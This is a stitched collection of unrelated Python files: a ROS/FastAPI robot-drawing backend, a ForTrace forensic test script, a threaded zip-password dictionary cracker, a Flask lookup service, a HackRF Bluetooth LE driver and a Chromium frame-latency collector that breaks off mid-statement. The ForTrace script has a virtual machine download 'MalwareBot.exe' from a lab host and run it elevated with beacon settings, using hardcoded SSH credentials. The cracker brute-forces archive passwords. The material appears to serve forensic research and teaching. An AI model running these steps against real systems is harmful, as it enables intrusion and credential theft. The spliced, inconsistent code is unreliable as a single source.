dirname = rospy.get_param("/backend/home_path")
path_to_pic_file = dirname + "/dist/assets/static/pic.png"
while not path.exists(path_to_pic_file):
time.sleep(3)
return path_to_pic_file
# save generated picture to static folder
def callback_path_to_picture(ros_data: String) -> None:
dirname = rospy.get_param("/backend/home_path")
picture_path = dirname + "/dist/assets/static/pic.png"
copyfile(ros_data.data, picture_path)
# check robot status
def callback(ros_data: String) -> None:
global status
check = ros_data.data
if check == "start":
status = "busy"
elif check == "stop":
status = "available"
else:
rospy.logwarn("Error status message. should be 'start' or 'stop'.")
# ros subscribers and listeners
word_publisher = rospy.Publisher("/word_for_gakachu", String, queue_size=1)
color_publisher = rospy.Publisher("/color_height", String, queue_size=1)
test_publisher = rospy.Publisher("/run", String, queue_size=1)
status_listener = rospy.Subscriber("/film", String, callback, queue_size=1)
picture_path_listener = rospy.Subscriber("/run", String, callback_path_to_picture, queue_size=1)
dist_dir = rospy.get_param("/backend/dist")
# Fast API related
app = FastAPI()
class Word(BaseModel):
word: str
origins = ["*"]
app.add_middleware(
CORSMiddleware,
allow_origins=origins,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
# Mounting
app.mount("/dist", StaticFiles(directory=dist_dir), name="dist")
app.mount("/loading", StaticFiles(directory=dist_dir + "loading/"), name="loading")
app.mount("/assets", StaticFiles(directory=dist_dir + "assets/"), name="assets")
app.mount("/css", StaticFiles(directory=dist_dir + "assets/css"), name="css")
app.mount("/data", StaticFiles(directory=dist_dir + "assets/data/"), name="data")
app.mount("/Dev", StaticFiles(directory=dist_dir + "assets/data/dev"), name="Dev")
app.mount("/js", StaticFiles(directory=dist_dir + "assets/js"), name="js")
app.mount("/static", StaticFiles(directory=dist_dir + "assets/static"), name="static")
templates = Jinja2Templates(directory=dist_dir)
status = "available"
# main page
@app.get("/", response_class=HTMLResponse)
def root(request: Request) -> Any:
return templates.TemplateResponse("index.html", {"request": request})
# page for robot painting
@app.get("/Loading", response_class=HTMLResponse)
def loading_page(request: Request) -> Any:
return templates.TemplateResponse("loading/index.html", {"request": request})
# Result page
@app.get("/drawing-finished", response_class=HTMLResponse)
def finish_page(request: Request) -> Any:
dirname = rospy.get_param("/backend/home_path")
path_to_pic_file = dirname + "/dist/assets/static/pic.png"
remove(path_to_pic_file)
return templates.TemplateResponse("drawing-finished/index.html", {"request": request})
# get word to draw
@app.post("/send_word", response_class=JSONResponse)
def send_word(words: Word) -> Dict[str, str]:
word_publisher.publish(String(words.word))
return {"status": "OK"}
# return robot status - "available" or "busy"
@app.get("/status", response_class=JSONResponse)
def status_response() -> Dict[str, str]:
return {"status": status}
# In DEV mode correct brush height
@app.get("/brush_lower", response_class=JSONResponse)
def lower() -> Dict[str, str]:
color_publisher.publish("minus")
return {"status": "OK"}
@app.get("/brush_raise", response_class=JSONResponse)
def raiser() -> Dict[str, str]:
color_publisher.publish("plus")
return {"status": "OK"}
# Do smear to test current brush height
@app.get("/test_brush_position", response_class=JSONResponse)
def test_position() -> Dict[str, str]:
test_publisher.publish("/home/kuka/kuka_pics/empty.png")
return {"status": "OK"}
# return qr image picture
@app.get("/picture", response_class=FileResponse)
def drawing_picture_return():
return picture_exist()
# return qr code picture
@app.get("/qr", response_class=FileResponse)
def qr_picture_return():
dirname = rospy.get_param("/backend/home_path")
path_to_qr_file = dirname + "/dist/assets/static/qr.png"
return path_to_qr_file
if __name__ == "__main__":
uvicorn.run(app, host="127.0.0.1", port=5000, log_level="debug")
|
simpleMalwareSerPer.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#Tests persistence mechanism of malware component by creating an autostart service
import sys
import time
import logging
import subprocess
import threading
import paramiko
try:
from fortrace.core.vmm import Vmm
from fortrace.utility.logger_helper import create_logger
from fortrace.core.vmm import GuestListener
except ImportError as e:
print("Import error in fortracemaster.py! " + str(e))
sys.exit(1)
def create_vm(logger):
# virtual_machine_monitor1 = Vmm(logger, linux_template='linux_template')
macsInUse = []
guests = []
guestListener = GuestListener(guests, logger)
virtual_machine_monitor1 = Vmm(macsInUse, guests, logger)
# guest = virtual_machine_monitor1.create_guest(guest_name="l-guest01", platform="linux", boottime=None)
guest = virtual_machine_monitor1.create_guest(guest_name="w-guest01", platform="windows", boottime=None)
logger.debug("Try connecting to guest")
while guest.state != "connected":
logger.debug(".")
time.sleep(1)
logger.debug(guest.guestname + " is connected!")
return guest
def start_malware_server(config):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect("192.168.122.219", username="fortrace-service", password="$Anfang01")
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command("cd C:\users\fortrace-service\Desktop & MalwareServer.exe " + config)
exit_status = ssh_stdout.channel.recv_exit_status()
print("Malware Server: Error", exit_status)
print("----------------------------------------------------------\n")
print("Malware Server: \n")
print(ssh_stderr.read())
print(ssh_stdout.read())
print("\n----------------------------------------------------------\n")
return
def main():
"""
Test Script for fortrace.
:return: no return value
"""
try:
logger = create_logger('fortraceManager', logging.DEBUG)
logger.info("This is a test script to check the functionallity of the fortrace library" + '\n')
guest = create_vm(logger)
serverThread = threading.Thread(target=start_malware_server, args=["server_config_service_per.txt"])
serverThread.start()
browser_obj = guest.application("webBrowserFirefox", {'webBrowser': "firefox"})
browser_obj.open(url="192.168.122.219:8080/MalwareBot.exe")
while browser_obj.is_busy:
time.sleep(2)
time.sleep(60)
print("Sleep completed")
browser_obj.press_tab_test()
time.sleep(20)
browser_obj.press_enter_test()
time.sleep(30)
guest.runElevated('"C:\users\fortrace\Downloads\MalwareBot.exe" "dnsServer=192.168.122.219 webServer=192.168.122.219 webPort=7777 Beacon=1"')
serverThread.join()
print("Before shutdown")
guest.shutdown('keep')
while guest.isGuestPowered():
time.sleep(1)
time.sleep(10)
serverThread = threading.Thread(target=start_malware_server, args=["server_config_interval.txt"])
serverThread.start()
time.sleep(5)
guest.start()
guest.waitTillAgentIsConnected()
time.sleep(50)
serverThread.join()
guest.remove("keep")
######## CLEANUP ############# ERROR HANDLING
except KeyboardInterrupt as k:
logger.debug(k)
logger.debug("KeyboardInterrupt")
logger.debug(k)
logger.debug(virtual_machine_monitor1)
raw_input("Press Enter to continue...")
virtual_machine_monitor1.clear()
logger.debug("cleanup here")
try:
virtual_machine_monitor1.clear()
except NameError:
logger.debug("well, host1 was not defined!")
exit(0)
except Exception as e:
logger.debug("main gets the error: " + str(e))
logger.debug("cleanup here")
raw_input("Press Enter to continue...")
try:
virtual_machine_monitor1.clear()
subprocess.call(["/etc/init.d/libvirt-bin", "restart"])
except NameError:
logger.debug("well, host1 was not defined!")
sys.exit(1)
if __name__ == "__main__":
try:
main()
except:
sys.exit(1)
|
zip_file_cracker.py | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 2019-04-26 1:01
# @Author : Zhang Bin
# @Site : home
# @File : zip_file_cracker.py
# @Software: PyCharm
import zipfile
import optparse
from threading import Thread
def extract_file(file, password):
"""测试密码是否能开启文件"""
try:
file.extractall(pwd=password)
print '[+] Found password: ' + password + '\n'
except:
pass
def main():
"""主程序"""
# 规定参数
parser = optparse.OptionParser("usage %prog -f <zipfile> -d <dictionary>")
parser.add_option('-f', dest='zname', type='string', help='specify zip file')
parser.add_option('-d', dest='dname', type='string',
help='specify dictionaty file')
(options, args) = parser.parse_args()
if (options.zname == None) | (options.dname == None):
print parser.usage
exit(0)
else:
zname = options.zname
dname = options.dname
# 载入压缩文件
z_file = zipfile.ZipFile(zname)
# 打开密码文件,对压缩文件暴力破解密码
with open(dname, 'r') as f:
for line in f.readlines():
password = line.strip('\n')
t = Thread(target=extract_file, args=(z_file, password))
t.start()
if __name__ == '__main__':
main()
|
backend.py | from werkzeug.serving import make_server
from flask import Flask
from threading import Thread
import os
import toml
import json
from .interface import ServiceInterface
from .logger import debug
from .consts import DATA_SOURCES, NAME
HOST = '127.0.0.1'
PORT = 9006
class FlaskServer(object):
def __init__(self, name, host=HOST, port=PORT, routes=[]):
self.port = port
self.host = host
self.running = False
self.app = None
self.thread = None
self.name = name
self.srv = None
self.routes = routes
def start(self):
self.app = Flask(self.name)
for route in self.routes:
rule = route['rule']
endpoint = route['endpoint']
view_func = route['view_func']
methods = route['methods']
debug("Adding rule:%s as (%s)" % (rule, endpoint))
self.app.add_url_rule(rule, endpoint=endpoint,
view_func=view_func, methods=methods)
self.srv = make_server(self.host, self.port, self.app)
self.thread = Thread(target=self.run_app, args=())
_params = (self.name, self.host, self.port)
debug("Starting server (%s) in thread: %s:%s" % _params)
self.thread.start()
def stop(self):
if self.srv is not None:
debug("Stopping server (%s)" % (self.name))
self.srv.shutdown()
self.thread.join()
def run_app(self):
debug("Running the app server (%s) in an infinite loop " % (self.name))
self.srv.serve_forever()
class QueryService(ServiceInterface):
HOST = '127.0.0.1'
PORT = 9006
def __init__(self, sources=[], **kargs):
super(QueryService, self).__init__(**kargs)
self.sources = sources
self.routes = [
{'rule': "/",
"endpoint": "test",
"view_func": self.test,
"methods": ['GET', ],
},
{'rule': "/topsites/update",
"endpoint": "update",
"view_func": self.update,
"methods": ['GET', ],
},
{'rule': "/topsites/load",
"endpoint": "load",
"view_func": self.load,
"methods": ['GET', ],
},
{'rule': "/topsites/check/<domain>",
"endpoint": "check",
"view_func": self.check,
"methods": ['GET', ],
},
]
self.name = kargs.get('name', '')
# self.server = FlaskServer(name=self.name, host=host, port=port,
# routes=self.routes, **kargs)
self.server = FlaskServer(routes=self.routes, **kargs)
def test(self, **kargs):
debug("Testing server (%s) sources " % (self.name))
return 'works'
def update(self, **kargs):
debug("Updating server (%s) sources " % (self.name))
for s in self.sources:
s.update()
return json.dumps({'operation': 'load', 'result': True})
def load(self, **kargs):
debug("Loading server (%s) sources " % (self.name))
for s in self.sources:
s.load()
return json.dumps({'operation': 'load', 'result': True})
def load_and_start(self, **kargs):
debug("Loading server (%s) sources " % (self.name))
for s in self.sources:
s.load()
self.start()
def check(self, domain=None, **kargs):
debug("Checking server (%s) sources for %s" % (self.name, domain))
source_results = {'operation': 'check',
'domain': domain,
'results': {}}
if domain is None:
return source_results
for s in self.sources:
r = s.check(domain)
if len(r) == 0:
continue
source_results['results'][s.name] = r
return json.dumps(source_results)
def start(self):
debug("Starting service (%s)" % (self.name))
self.server.start()
def stop(self):
debug("Stopping service (%s)" % (self.name))
self.server.stop()
@classmethod
def parse_toml(cls, toml_dict):
ts_block = toml_dict[NAME] if NAME in toml_dict else toml_dict
sources_blocks = ts_block.get('sources', {})
if len(sources_blocks) == 0:
raise Exception("One or more data sources must be specified")
sources = []
for block in sources_blocks.values():
bt = block.get('type', None)
if bt is None or bt not in DATA_SOURCES:
raise Exception("Source type is not valid or unknown: %s" % bt)
b_cls = DATA_SOURCES.get(bt)
source = b_cls.parse_toml(block)
sources.append(source)
kargs = {'sources': sources}
kargs['host'] = ts_block.get('host', HOST)
kargs['port'] = ts_block.get('port', PORT)
kargs['name'] = ts_block.get('name', 'not specified')
return cls(**kargs)
@classmethod
def parse_toml_file(cls, toml_file):
try:
os.stat(toml_file)
toml_dict = toml.load(open(toml_file))
return cls.parse_toml(toml_dict)
except:
raise
|
hackrf.py | from scapy.all import *
from mirage.libs import wireless,io,utils
from mirage.libs.ble_utils.constants import *
from mirage.libs.common.sdr import sources,demodulators,decoders,sinks,modulators
from mirage.libs.ble_utils.decoders import BLEDecoder
from mirage.libs.ble_utils.encoders import BLEEncoder
from mirage.libs.ble_utils.helpers import *
import time
class BLEHackRFDevice(wireless.SDRDevice):
'''
This device allows to communicate with a HackRF Device in order to interact with Bluetooth Low Energy protocol.
HackRF support is **experimental**, the demodulator is slow and it can only deal with advertisements.
The corresponding interfaces are : ``hackrfX`` (e.g. "hackrf0")
The following capabilities are actually supported :
+-------------------------------------------+----------------+
| Capability | Available ? |
+===========================================+================+
| SCANNING | yes |
+-------------------------------------------+----------------+
| ADVERTISING | yes |
+-------------------------------------------+----------------+
| SNIFFING_ADVERTISEMENTS | yes |
+-------------------------------------------+----------------+
| SNIFFING_NEW_CONNECTION | no |
+-------------------------------------------+----------------+
| SNIFFING_EXISTING_CONNECTION | no |
+-------------------------------------------+----------------+
| JAMMING_CONNECTIONS | no |
+-------------------------------------------+----------------+
| JAMMING_ADVERTISEMENTS | no |
+-------------------------------------------+----------------+
| INJECTING | no |
+-------------------------------------------+----------------+
| MITMING_EXISTING_CONNECTION | no |
+-------------------------------------------+----------------+
| HIJACKING_MASTER | no |
+-------------------------------------------+----------------+
| HIJACKING_SLAVE | no |
+-------------------------------------------+----------------+
| INITIATING_CONNECTION | no |
+-------------------------------------------+----------------+
| RECEIVING_CONNECTION | no |
+-------------------------------------------+----------------+
| COMMUNICATING_AS_MASTER | no |
+-------------------------------------------+----------------+
| COMMUNICATING_AS_SLAVE | no |
+-------------------------------------------+----------------+
| HCI_MONITORING | no |
+-------------------------------------------+----------------+
'''
sharedMethods = [
"getChannel",
"setChannel",
"isConnected",
"setAddress",
"getAddress",
"sniffAdvertisements",
"setAdvertising",
"setAdvertisingParameters",
"setScanningParameters",
"setScan",
"setScanInterval",
"getMode",
"getFirmwareVersion",
"getSerial",
"getAPIVersion",
"getDeviceIndex",
"getBoardName",
"getBoardID"
]
def __init__(self,interface):
self.ready = False
self.channel = 37
self.scanThreadInstance = None
self.advThreadInstance = None
self.scanInterval = 1
self.advData=b""
self.address = "11:22:33:44:55:66"
self.advType=ADV_IND
self.daType = "public"
self.oaType = "public"
self.destAddress = "00:00:00:00:00:00"
self.intervalMin = 200
self.intervalMax = 210
self.experimentalDemodulatorEnabled = False
super().__init__(interface=interface)
def isUp(self):
return self.sink.isReady() and self.sink.isReady()
def init(self):
if self.source.isReady() and self.sink.isReady():
self.ready = True
self.capabilities = ["ADVERTISING","SCANNING","SNIFFING_ADVERTISEMENTS"]
def send(self,packet):
self.transmitPipeline.setInput(bytes(packet))
def recv(self):
packet = self.receivePipeline.getOutput()
if packet is not None:
timestamp = time.time()
ts_sec = int(timestamp)
ts_usec = int((timestamp - ts_sec)*1000000)
rssi = 0
return (BTLE_PPI(
rssi_avg=rssi,
rssi_max=rssi,
rssi_min=rssi,
rssi_count=1,
btle_channel=self.channel,
btle_clkn_high=ts_sec,
btle_clk_100ns=ts_usec,
)/BTLE(packet[0]),
packet[1])
else:
return None
def buildReceivePipeline(self,interface):
self.source = sources.HackRFSource(interface)
if self.source.isReady():
self.source.setFrequency(channelToFrequency(self.channel) * 1000 * 1000)
self.source.setSampleRate(2 * 1000 * 1000)
self.source.setBandwidth(1 * 1000 * 1000)
self.source.setGain(30)
self.source.setLNAGain(20)
self.source.enableAntenna()
self.demodulator = self._getDemodulator()
self.decoder = BLEDecoder(samplesPerSymbol=2)
return (self.source >> self.demodulator >> self.decoder)
else:
return None
def _getDemodulator(self):
return (demodulators.FSK2Demodulator(
preamble="01101011011111011001000101110001",
size=8*40,
samplesPerSymbol=2)
if not self.experimentalDemodulatorEnabled else
demodulators.FasterFSK2Demodulator(
preamble="01101011011111011001000101110001",
size=8*40,
samplesPerSymbol=2) )
def setExperimentalDemodulator(self,enable=True):
self.experimentalDemodulatorEnabled = enable
if enable and self.receivePipeline is not None:
started = self.receivePipeline.isStarted()
if started:
self.receivePipeline.stop()
self.receivePipeline.updateDemodulator(self._getDemodulator())
if started:
self.receivePipeline.start()
def buildTransmitPipeline(self,interface):
self.sink = sinks.HackRFSink(interface)
if self.sink.isReady():
self.sink.setFrequency(channelToFrequency(self.channel) * 1000 * 1000)
self.sink.setSampleRate(2 * 1000 * 1000)
self.sink.setBandwidth(1 * 1000 * 1000)
self.sink.setTXGain(42)
self.sink.setLNAGain(40)
self.sink.enableAntenna()
self.modulator = modulators.GFSKModulator(samplesPerSymbol=2)
self.encoder = BLEEncoder(channel=37)
return (self.sink << self.modulator << self.encoder)
return None
def setAddress(self,address,random=False):
'''
This method allows to modify the BD address and the BD address type of the device, if it is possible.
:param address: new BD address
:type address: str
:param random: boolean indicating if the address is random
:type random: bool
:return: boolean indicating if the operation was successful
:rtype: bool
:Example:
>>> hackrfDevice.setAddress("11:22:33:44:55:66")
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.address = address.upper()
self.daType = "random" if random else "public"
return True
def getAddress(self):
'''
This method returns the actual BD address of the device.
:return: str indicating the BD address
:rtype: str
:Example:
>>> device.getAddress()
'1A:2B:3C:4D:5E:6F'
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.address.upper()
def setChannel(self, channel):
'''
This method changes the channel actually in use by the provided channel.
:param channel: new channel
:type channel: int
:Example:
>>> device.getChannel()
37
>>> device.setChannel(channel=38)
>>> device.getChannel()
38
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
if (channel >= 0 and channel <= 39 and channel != self.channel):
receiveEnabled = self.receivePipeline.isStarted()
transmitEnabled = self.transmitPipeline.isStarted()
if receiveEnabled:
self.receivePipeline.stop()
if transmitEnabled:
self.transmitPipeline.stop()
self.channel = channel
self.source.setFrequency(channelToFrequency(channel) * 1000 * 1000)
self.sink.setFrequency(channelToFrequency(channel) * 1000 * 1000)
self.decoder.setChannel(channel)
self.encoder.setChannel(channel)
if receiveEnabled:
self.receivePipeline.start()
if transmitEnabled:
self.transmitPipeline.start()
return True
return False
def getChannel(self):
'''
This method returns the channel actually in use.
:return: channel in use
:rtype: int
:Example:
>>> device.getChannel()
37
>>> device.setChannel(channel=38)
>>> device.getChannel()
38
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.channel
def sniffAdvertisements(self,address='FF:FF:FF:FF:FF:FF',channel=None):
'''
This method starts the advertisement sniffing mode.
:param address: selected address - if not provided, no filter is applied (format : "1A:2B:3C:4D:5E:6F")
:type address: str
:param channel: selected channel - if not provided, channel 37 is selected
:type channel: int
:Example:
>>> device.sniffAdvertisements()
>>> device.sniffAdvertisements(channel=38)
>>> device.sniffAdvertisements(address="1A:2B:3C:4D:5E:6F")
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
if channel is not None and channel >= 37 and channel <= 39:
self.setChannel(channel)
self.receivePipeline.start()
def setScanInterval(self,seconds=1):
'''
This method allows to provide the scan interval (in second).
:param seconds: number of seconds to wait between two channels
:type seconds: float
:Example:
>>> device.setScanInterval(seconds=1)
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.scanInterval = seconds
def _buildAdvertisement(self):
packet = BTLE()/BTLE_ADV(RxAdd=0x00 if self.oaType == "public" else 0x01,TxAdd=0x00 if self.daType == "public" else 0x01)
if self.advType == ADV_IND:
packet /= BTLE_ADV_IND(AdvA = self.address, data=EIR_Hdr(self.advData))
elif self.advType == ADV_DIRECT_IND:
packet /= BTLE_ADV_DIRECT_IND(AdvA = self.address, InitA = self.destAddress)
elif self.advType == ADV_NONCONN_IND:
packet /= BTLE_ADV_NONCONN_IND()
elif self.advType == ADV_SCAN_IND:
packet /= BTLE_ADV_SCAN_IND()
elif self.advType == SCAN_REQ:
packet /= BTLE_SCAN_REQ(AdvA = self.address, ScanA = self.destAddress)
elif self.advType == SCAN_RSP:
packet /= BTLE_SCAN_RSP(AdvA = self.address, data=EIR_Hdr(self.advData))
return packet
def _advertisingThread(self):
self.setChannel(37)
self.send(self._buildAdvertisement())
utils.wait(seconds=0.75)
self.setChannel(38)
self.send(self._buildAdvertisement())
utils.wait(seconds=0.75)
self.setChannel(39)
self.send(self._buildAdvertisement())
utils.wait(seconds=0.75)
def setAdvertising(self,enable=True):
'''
This method enables or disables the advertising mode.
:param enable: boolean indicating if the advertising mode must be enabled
:type enable: bool
:Example:
>>> device.setAdvertising(enable=True) # advertising mode enabled
>>> device.setAdvertising(enable=False) # advertising mode disabled
.. warning::
Please note that if no advertising and scanning data has been provided before this function call, nothing will be advertised. You have to set the scanning Parameters and the advertising Parameters before calling this method.
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
if enable:
if self.advThreadInstance is None:
self.receivePipeline.stop()
self.transmitPipeline.start()
self.advThreadInstance = wireless.StoppableThread(target=self._advertisingThread)
self.advThreadInstance.start()
else:
if self.advThreadInstance is not None:
self.advThreadInstance.stop()
self.transmitPipeline.stop()
self.advThreadInstance = None
self.receivePipeline.start()
def _scanThread(self):
self.sniffAdvertisements(channel=37)
utils.wait(seconds=self.scanInterval)
self.sniffAdvertisements(channel=38)
utils.wait(seconds=self.scanInterval)
self.sniffAdvertisements(channel=39)
utils.wait(seconds=self.scanInterval)
def isConnected(self):
'''
This method returns a boolean indicating if the device is connected.
:return: boolean indicating if the device is connected
:rtype: bool
.. warning::
This method always returns False, it allows to provides the same API as the HCI Device.
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return False
def setScan(self,enable=True):
'''
This method enables or disables the scanning mode. It allows to change the channel according to the scan interval parameter.
:param enable: boolean indicating if the scanning mode must be enabled
:type enable: bool
:Example:
>>> device.setScan(enable=True) # scanning mode enabled
>>> device.setScan(enable=False) # scanning mode disabled
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
if enable:
self.sniffAdvertisements()
if self.scanThreadInstance is None:
self.scanThreadInstance = wireless.StoppableThread(target=self._scanThread)
self.scanThreadInstance.start()
else:
if self.scanThreadInstance is not None:
self.scanThreadInstance.stop()
self.scanThreadInstance = None
def setAdvertisingParameters(self,type = "ADV_IND",destAddr = "00:00:00:00:00:00",data = b"",intervalMin = 200, intervalMax = 210, daType='public', oaType='public'):
'''
This method sets advertising parameters according to the data provided.
It will mainly be used by *ADV_IND-like* packets.
:param type: type of advertisement (*available values :* "ADV_IND", "ADV_DIRECT_IND", "ADV_SCAN_IND", "ADV_NONCONN_IND", "ADV_DIRECT_IND_LOW")
:type type: str
:param destAddress: destination address (it will be used if needed)
:type destAddress: str
:param data: data included in the payload
:type data: bytes
:param intervalMin: minimal interval
:type intervalMin: int
:param intervalMax: maximal interval
:type intervalMax: int
:param daType: string indicating the destination address type ("public" or "random")
:type daType: str
:param oaType: string indicating the origin address type ("public" or "random")
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.setScan(enable=False)
if type == "ADV_IND":
self.advType = ADV_IND
elif type == "ADV_DIRECT_IND":
self.advType = ADV_DIRECT_IND
elif type == "ADV_SCAN_IND":
self.advType = ADV_SCAN_IND
elif type == "ADV_NONCONN_IND":
self.advType = ADV_NONCONN_IND
elif type == "ADV_DIRECT_IND_LOW":
self.advType = ADV_DIRECT_IND_LOW
else:
io.fail("Advertisements type not recognized, using ADV_IND.")
self.advType = ADV_IND
self.destAddress = None if destAddr == "00:00:00:00:00:00" else destAddr
self.advData = data
self.daType = daType
self.oaType = oaType
self.intervalMin = intervalMin
self.intervalMax = intervalMax
io.warning("Advertising interval will be ignored")
def setScanningParameters(self, data):
'''
This method sets scanning parameters according to the data provided.
It will mainly be used by *SCAN_RESP* packets.
:param data: data to use in *SCAN_RESP*
:type data: bytes
.. warning::
This method does nothing, it allows to provides the same API as the HCI Device.
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
io.warning("Scanning not supported, this operation will be ignored")
def getFirmwareVersion(self):
'''
This method returns the firmware version of the current HackRF device.
:return: firmware version
:rtype: str
:Example:
>>> device.getFirmwareVersion()
'git-a9945ff'
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.source.getFirmwareVersion()
def getSerial(self):
'''
This method returns the serial number of the current HackRF device.
:return: serial number
:rtype: str
:Example:
>>> device.getSerialNumber()
'0000000000000000a06063c8234e925f'
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.source.getSerial()
def getAPIVersion(self):
'''
This method returns the API version of the HackRF library.
:return: API version as a tuple of (major, minor)
:rtype: tuple of (int,int)
:Example:
>>> device.getAPIVersion()
(1, 4)
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.source.getAPIVersion()
def getDeviceIndex(self):
'''
This method returns the device index of the current HackRF.
:return: device index
:rtype: int
:Example:
>>> device.getDeviceIndex()
0
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.source.getDeviceIndex()
def getBoardName(self):
'''
This method returns the board name of the current HackRF.
:return: board name
:rtype: str
:Example:
>>> device.getBoardName()
'HackRF One'
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.source.getBoardName()
def getBoardID(self):
'''
This method returns the board identifier of the current HackRF.
:return: board identifier
:rtype: int
:Example:
>>> device.getBoardID()
2
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.source.getBoardID()
|
surface_stats_collector.py | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import Queue
import datetime
import logging
import re
import threading
from pylib import perf_tests_helper
# Log marker containing SurfaceTexture timestamps.
_SURFACE_TEXTURE_TIMESTAMPS_MESSAGE = 'SurfaceTexture update timestamps'
_SURFACE_TEXTURE_TIMESTAMP_RE = '\d+'
class SurfaceStatsCollector(object):
"""Collects surface stats for a window from the output of SurfaceFlinger.
Args:
adb: the adb coonection to use.
window_package: Package name of the window.
window_activity: Activity name of the window.
"""
def __init__(self, adb, window_package, window_activity, trace_tag):
self._adb = adb
self._window_package = window_package
self._window_activity = window_activity
self._trace_tag = trace_tag
self._collector_thread = None
self._use_legacy_method = False
self._surface_before = None
self._get_data_event = None
self._data_queue = None
self._stop_event = None
def __enter__(self):
assert not self._collector_thread
if self._ClearSurfaceFlingerLatencyData():
self._get_data_event = threading.Event()
self._stop_event = threading.Event()
self._data_queue = Queue.Queue()
self._collector_thread = threading.Thread(target=self._CollectorThread)
self._collector_thread.start()
else:
self._use_legacy_method = True
self._surface_before = self._GetSurfaceStatsLegacy()
def __exit__(self, *args):
self._PrintPerfResults()
if self._collector_thread:
self._stop_event.set()
self._collector_thread.join()
self._collector_thread = None
def _PrintPerfResults(self):
if self._use_legacy_method:
surface_after = self._GetSurfaceStatsLegacy()
td = surface_after['timestamp'] - self._surface_before['timestamp']
seconds = td.seconds + td.microseconds / 1e6
frame_count = (surface_after['page_flip_count'] -
self._surface_before['page_flip_count'])
else:
assert self._collector_thread
(seconds, latencies) = self._GetDataFromThread()
if not seconds or not len(latencies):
logging.warning('Surface stat data is empty')
return
frame_count = len(latencies)
jitter_count = 0
last_latency = latencies[0]
for latency in latencies[1:]:
if latency > last_latency:
jitter_count = jitter_count + 1
last_latency = latency
perf_tests_helper.PrintPerfResult(
'surface_latencies', 'surface_latencies' + self._trace_tag,
latencies, '')
perf_tests_helper.PrintPerfResult(
'peak_jitter', 'peak_jitter' + self._trace_tag, [max(latencies)], '')
perf_tests_helper.PrintPerfResult(
'jitter_percent', 'jitter_percent' + self._trace_tag,
[jitter_count * 100.0 / frame_count], 'percent')
print 'SurfaceMonitorTime: %fsecs' % seconds
perf_tests_helper.PrintPerfResult(
'avg_surface_fps', 'avg_surface_fps' + self._trace_tag,
[int(round(frame_count / seconds))], 'fps')
def _CollectorThread(self):
last_timestamp = 0
first_timestamp = 0
latencies = []
retries = 0
has_collected_data = False
while not self._stop_event.is_set():
self._get_data_event.wait(1)
try:
(t, last_timestamp) = self._GetSurfaceFlingerLatencyData(last_timestamp,
latencies)
if (t, last_timestamp) == (None, None):
retries += 1
if retries < 3:
continue
if has_collected_data:
# Some data has already been collected, but either the app
# was closed or there's no new data. Signal the main thread and
# wait.
self._data_queue.put((None, None))
self._stop_event.wait()
break
raise Exception('Unable to get surface flinger latency data')
has_collected_data = True
if not first_timestamp:
first_timestamp = t
if self._get_data_event.is_set():
self._get_data_event.clear()
self._data_queue.put(((last_timestamp - first_timestamp) / 1e9,
latencies))
latencies = []
first_timestamp = 0
except Exception as e:
# On any error, before aborting, put the exception into _data_queue to
# prevent the main thread from waiting at _data_queue.get() infinitely.
self._data_queue.put(e)
raise
def _GetDataFromThread(self):
self._get_data_event.set()
ret = self._data_queue.get()
if isinstance(ret, Exception):
raise ret
return ret
def _ClearSurfaceFlingerLatencyData(self):
"""Clears the SurfaceFlinger latency data.
Returns:
True if SurfaceFlinger latency is supported by the device, otherwise
False.
"""
# The command returns nothing if it is supported, otherwise returns many
# lines of result just like 'dumpsys SurfaceFlinger'.
results = self._adb.RunShellCommand(
'dumpsys SurfaceFlinger --latency-clear %s/%s' %
(self._window_package, self._window_activity))
return not len(results)
def _GetSurfaceFlingerLatencyData(self, previous_timestamp, latencies):
"""Returns collected SurfaceFlinger latency data.
Args:
previous_timestamp: The timestamp returned from the previous call or 0.
Only data after this timestamp will be returned.
latencies: A list to receive latency data. The latencies are integers
each of which is the number of refresh periods of each frame.
Returns:
A tuple containing:
- The timestamp of the beginning of the first frame (ns),
- The timestamp of the end of the last frame (ns).
The tuple may be (None, None) if there was no data collected (for example,
if the app was closed before the collector thread has finished).
"""
# adb shell dumpsys SurfaceFlinger --latency <window name>
# prints some information about the last 128 frames displayed in
# that window.
# The data returned looks like this:
# 16954612
# 7657467895508 7657482691352 7657493499756
# 7657484466553 7657499645964 7657511077881
# 7657500793457 7657516600576 7657527404785
# (...)
#
# The first line is the refresh period (here 16.95 ms), it is followed
# by 128 lines w/ 3 timestamps in nanosecond each:
# A) when the app started to draw
# B) the vsync immediately preceding SF submitting the frame to the h/w
# C) timestamp immediately after SF submitted that frame to the h/w
#
# The difference between the 1st and 3rd timestamp is the frame-latency.
# An interesting data is when the frame latency crosses a refresh period
# boundary, this can be calculated this way:
#
# ceil((C - A) / refresh-period)
#
# (each time the number above changes, we have a "jank").
# If this happens a lot during an animation, the animation appears
# janky, even if it runs at 60 fps in average.
results = self._adb.RunShellCommand(
